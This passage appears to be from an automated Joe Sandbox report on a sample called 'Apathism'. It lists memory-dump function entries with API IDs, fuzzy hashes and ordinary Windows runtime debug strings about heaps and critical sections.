                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                          • API String ID: 0-2474120054
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                          • API String ID: 3446177414-3610490719
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 223A728C
                          Strings
                          • RTL: Resource at %p, xrefs: 223A72A3
                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 223A7294
                          • RTL: Re-Waiting, xrefs: 223A72C1
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                          • API String ID: 885266447-605551621
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: %%%u$]:%u
                          • API String ID: 48624451-3050659472
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          • Opcode ID: 8788ed82b7f0a3c54582e6928aa1b590936b8f722e7516cd06dc6da485c5e1c2
                          • Instruction ID: 647932532b1fdb7102d259a8dde17fad49bd8420a14998ed790b1cc3a610367c
                          • Opcode Fuzzy Hash: 8788ed82b7f0a3c54582e6928aa1b590936b8f722e7516cd06dc6da485c5e1c2
                          • Instruction Fuzzy Hash: 51516A357007229FDB0CCE59C5A5A29B7F1BB89214B24457EDA06DB711DB78EE81CB80
                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          • Opcode ID: 101cfee53a024c8d7ae15235f3916907d6795f2cfd5c4b09174b8e5f22d9e289
                          • Instruction ID: a5982f872ee888fad466d676ee0e247ef14daaa528a98e86f17d99c66cba9235
                          • Opcode Fuzzy Hash: 101cfee53a024c8d7ae15235f3916907d6795f2cfd5c4b09174b8e5f22d9e289
                          • Instruction Fuzzy Hash: 925133B6E003199FDF08CF95C950ADDBBB5FF48314F14812AE915AB290DB399A01CF94
                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes$BaseInitThreadThunk
                          • String ID:
                          • API String ID: 4281723722-0
                          • Opcode ID: 8edabca638f528cafa0abde3e36b25f7531f0ce419e17715ed40c606393adee3
                          • Instruction ID: 963b264476455c2ab072da1865bcde702d38bcbfe3973dd63c5ede1045d8a6c1
                          • Opcode Fuzzy Hash: 8edabca638f528cafa0abde3e36b25f7531f0ce419e17715ed40c606393adee3
                          • Instruction Fuzzy Hash: 40311475E40328DFCF19DFA9D894A9DBBB1FB48320F11462AEA12B7294DB355900CF54
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: 0$Flst
                          • API String ID: 0-758220159
                          • Opcode ID: 2099d45c3ac0900342917b70ae1c4d7982e713a67d797c012e6df6d348789c9f
                          • Instruction ID: 88f3f8b0c9d8d4ddfc825c0acacc0ab84e1dfd94a8e49b2c96c24fecadfab010
                          • Opcode Fuzzy Hash: 2099d45c3ac0900342917b70ae1c4d7982e713a67d797c012e6df6d348789c9f
                          • Instruction Fuzzy Hash: AA51A071E003049FCB24CF99C68476DFBF8EF44728F15812AD2499F25AEB709A81CB84
                          APIs
                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 223BCFBD
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: CallFilterFunc@8
                          • String ID: @$@4_w@4_w
                          • API String ID: 4062629308-713214301
                          • Opcode ID: f120cc8ca8574d1d881716c5511220b850c8d409ae87b0198530d8a9e425e451
                          • Instruction ID: 8637218a413bfbb77af52a81d4d74fecf706854c53420c12a641dbe58d833084
                          • Opcode Fuzzy Hash: f120cc8ca8574d1d881716c5511220b850c8d409ae87b0198530d8a9e425e451
                          • Instruction Fuzzy Hash: D7419DB1D00718DFCB218FA5C980AAEBBF8FF55708F00456AEA15EB654DB349941CB61